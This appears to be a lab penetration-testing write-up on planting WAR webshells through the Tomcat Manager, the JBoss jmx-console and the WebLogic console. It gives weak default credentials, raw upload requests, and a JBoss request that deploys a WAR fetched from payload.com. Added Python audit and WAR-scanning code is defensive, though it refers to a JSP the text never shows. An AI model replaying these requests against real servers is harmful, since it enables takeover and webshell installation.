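Introduction
Remote deployment vulnerabilities are server and middleware configuration problems. An attacker can use them to obtain system privileges, and they frequently appear on web containers such as Tomcat, JBoss and WebLogic.
### 0x01 Deploying a WAR package on Tomcat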
http://192.168.52.128:8080/manager/html
tomcat/tomcat
POST /manager/html/upload;jsessionid=A0F8351E37AA865DDFC5EC921BFB4F9A?org.apache.catalina.filters.CSRF_NONCE=7C49D0AF0355D531EAB7DFE30F00FFA1 HTTP/1.1
Host: 192.168.52.128:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:8080/manager/html
Cookie: JSESSIONID=A0F8351E37AA865DDFC5EC921BFB4F9A
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------32062524929426
Content-Length: 31723
-----------------------------32062524929426
Content-Disposition: form-data; name="deployWar"; filename="test3693.war"
Content-Type: application/octet-stream
-----------------------------32062524929426--
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=19B04531B519E953AAD3E2200F9F3D84; Path=/manager; HttpOnly
Content-Type: text/html;charset=utf-8
Date: Mon, 22 Feb 2021 05:02:48 GMT
Connection: close
Content-Length: 19860
http://192.168.52.128:8080/manager/html/upload;jsessionid=A0F8351E37AA865DDFC5EC921BFB4F9A?org.apache.catalina.filters.CSRF_NONCE=7C49D0AF0355D531EAB7DFE30F00FFA1
FAIL – War file “test3693.war” already exists on server
http://192.168.52.128:8080/test3693/
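The upload above succeeds because the Manager accepts `tomcat/tomcat` from a remote address. As an added example (not part of the original post), the following Python audit flags deploy-capable accounts with weak passwords in `tomcat-users.xml` and checks whether the Manager's `context.xml` restricts client addresses with a `RemoteAddrValve`. The sample XML and the weak-password list are constructed for illustration, and the function names are hypothetical.

```python
import xml.etree.ElementTree as ET

# Roles that allow deploying applications through the Manager
# ("manager" is the legacy Tomcat 6 role name).
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager"}
# Short constructed list of weak passwords; extend it from your own policy.
WEAK_PASSWORDS = {"", "tomcat", "admin", "manager", "password", "s3cret", "123456"}


def _local(tag):
    """Strip an XML namespace: '{ns}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, deploy_roles, reason) for weak deploy-capable accounts."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        user = el.get("username") or el.get("name") or ""
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        deploy_roles = sorted(roles & DEPLOY_ROLES)
        if not deploy_roles:
            continue  # account cannot deploy, out of scope for this check
        if password.lower() == user.lower():
            reason = "password equals username"
        elif password.lower() in WEAK_PASSWORDS:
            reason = "well-known weak password"
        else:
            continue
        findings.append((user, deploy_roles, reason))
    return findings


def manager_is_address_restricted(context_xml):
    """True if the Manager context has a RemoteAddrValve with a real allow list."""
    for el in ET.fromstring(context_xml).iter():
        if _local(el.tag) != "Valve":
            continue
        if el.get("className", "").endswith(".RemoteAddrValve"):
            allow = el.get("allow", "").strip()
            if allow and allow not in {".*", ".+"}:
                return True
    return False


# Constructed sample configuration files.
SAMPLE_USERS = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="tomcat" roles="manager-gui"/>
  <user username="deployer" password="s3cret" roles="manager-script,manager-status"/>
  <user username="ops" password="kQ7#vT2p!xLm9w" roles="manager-gui"/>
  <user username="guest" password="guest" roles="role1"/>
</tomcat-users>"""

OPEN_CONTEXT = '<Context privileged="true"/>'
LOCAL_ONLY_CONTEXT = r"""<Context privileged="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1"/>
</Context>"""

if __name__ == "__main__":
    for user, roles, reason in audit_tomcat_users(SAMPLE_USERS):
        print(f"{user}: {', '.join(roles)} ({reason})")
    print("open context restricted:", manager_is_address_restricted(OPEN_CONTEXT))
    print("local-only context restricted:", manager_is_address_restricted(LOCAL_ONLY_CONTEXT))
```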
### 0x02 Remote WAR deployment on JBoss
http://192.168.52.128
http://192.168.52.128/jmx-console/
POST /jmx-console/HtmlAdaptor HTTP/1.1
Host: 192.168.52.120
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://192.168.52.128
Connection: close
Referer: http://192.168.52.128/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL
Cookie: PHPSESSID=ft4551u5ag2pu53sf5n4mgfqr0; immortal_png=undefined; immortal_etag=undefined; immortal_cache=undefined; md=nilihQQQmUvSPuXD1pm61Hk6EMV3222QLOzt4QJQaE8qzwt0lfxNnhjruFVW7odj; JSESSIONID=678AC48E10C635F07B63DEBEAE69ECD6
Upgrade-Insecure-Requests: 1
action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=7&arg0=http%3A%2F%2Fpayload.com%2Ftest.war
### 0x03 Deploying a WAR package on WebLogic
http://192.168.52.128:7001/console/login/LoginForm.jsp
weblogic:Oracle@123
Common weak WebLogic passwords: http://cirt.net/passwords?criteria=weblogic
GET /console/login/LoginForm.jsp HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/login/LoginForm.jsp
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951
Connection: close
Cache-Control: max-age=0
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Mon, 22 Feb 2021 05:56:57 GMT
Pragma: no-cache
Content-Length: 3162
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
<p id="footerVersion">WebLogic Server Version: 10.3.6.0</p>
After a successful login, the console redirects to the following address:
http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1
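Uploading a webshell through the admin console
After obtaining the administrator password, log in to the console. Click "Deployments" on the left to see a list of applications:
The request sent when clicking "Deployments" is as follows: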
GET /console/console.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951; JSESSIONID=QrzGgzJTYv0TVjxk1Vl2zmcrX4n1Gg25SDWNLvJdfJkbzrRCvK7l!-1106686951
Connection: close
HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Connection: close
Date: Mon, 22 Feb 2021 06:08:41 GMT
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 43772
Click "Install" and choose "Upload files":
Select the local WAR package to upload.
The upload request:
POST /console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/uploadApp HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/selectUploadApp
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951; JSESSIONID=QrzGgzJTYv0TVjxk1Vl2zmcrX4n1Gg25SDWNLvJdfJkbzrRCvK7l!-1106686951
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------8434166712903
Content-Length: 32108
-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletuploadAppPath"; filename="test3693.war"
Content-Type: application/octet-stream
-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletuploadPlanPath"; filename=""
Content-Type: application/octet-stream
-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletfrsc"
0x062430ecab863931868d682e81a64437e4490c23def60129
-----------------------------8434166712903--
HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Connection: close
Date: Mon, 22 Feb 2021 06:20:53 GMT
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 37476
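After that it is basically a matter of clicking Next all the way through. For detailed steps, see: https://www.cnblogs.com/DFX339/p/8515200.html
Deployment complete
Start configuring the system environment
http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=CoreServerServerTablePage
Select Protocols, then select HTTP
Click Deployments again
http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage
The project can then be accessed at http://IP:PORT/ProjectName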
http://192.168.52.128:7001/test3693/
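A defender-side triage of a WAR archive for the file-manager patterns visible in the JSP above (request parameters flowing into `File` / `FileOutputStream` paths, and hand-rolled multipart parsing), as an added example that is not code from the original post. The function names, finding labels and the in-memory sample archive are assumptions constructed for illustration; the sample JSP fragment reuses lines quoted on this page, and the regex heuristics only triage, they do not prove intent.

```python
import io
import re
import zipfile

PARAM = re.compile(r"(\w+)\s*=\s*request\.getParameter\s*\(")
ASSIGN = re.compile(r"(\w+)\s*=\s*(?:new\s+File\s*\(\s*)?(\w+)\s*[;+)]")
SINK = re.compile(r"new\s+(File(?:InputStream|OutputStream)?)\s*\(\s*(\w+)\s*[,+)]")

def scan_jsp(source):
    """Return sorted heuristic findings (hypothetical labels) for one JSP source."""
    tainted = set(PARAM.findall(source))  # variables read from request parameters
    grew = True
    while grew:  # propagate through simple assignments until a fixed point
        grew = False
        for dst, src in ASSIGN.findall(source):
            if src in tainted and dst not in tainted:
                tainted.add(dst)
                grew = True
    findings = {f"param-path:{sink}({var})"
                for sink, var in SINK.findall(source) if var in tainted}
    if "request.getInputStream(" in source and "multipart" in source.lower():
        findings.add("raw-multipart-upload")
    return sorted(findings)

def scan_war(war_bytes):
    """Map each JSP entry in a WAR (zip) to its findings; clean entries are omitted."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        for name in war.namelist():
            if name.lower().endswith((".jsp", ".jspx")):
                hits = scan_jsp(war.read(name).decode("utf-8", "replace"))
                if hits:
                    report[name] = hits
    return report

def build_sample_war():
    """Constructed sample: one benign JSP, one reusing fragments quoted on this page."""
    suspicious = (
        '<% String strDesFile=request.getParameter("file2");\n'
        'File f_des=new File(strDesFile);\n'
        'FileOutputStream out1=new FileOutputStream(f_des);\n'
        'if(request.getContentType().toLowerCase().startsWith("multipart")){\n'
        'Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);} %>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as war:
        war.writestr("index.jsp", "<%= new java.util.Date() %>")
        war.writestr("fm.jsp", suspicious)
    return buf.getvalue()
```

Running `scan_war` on archives found in the server's upload or staging directory, or on a WAR before it is approved for deployment, gives a quick list of JSPs that deserve manual review.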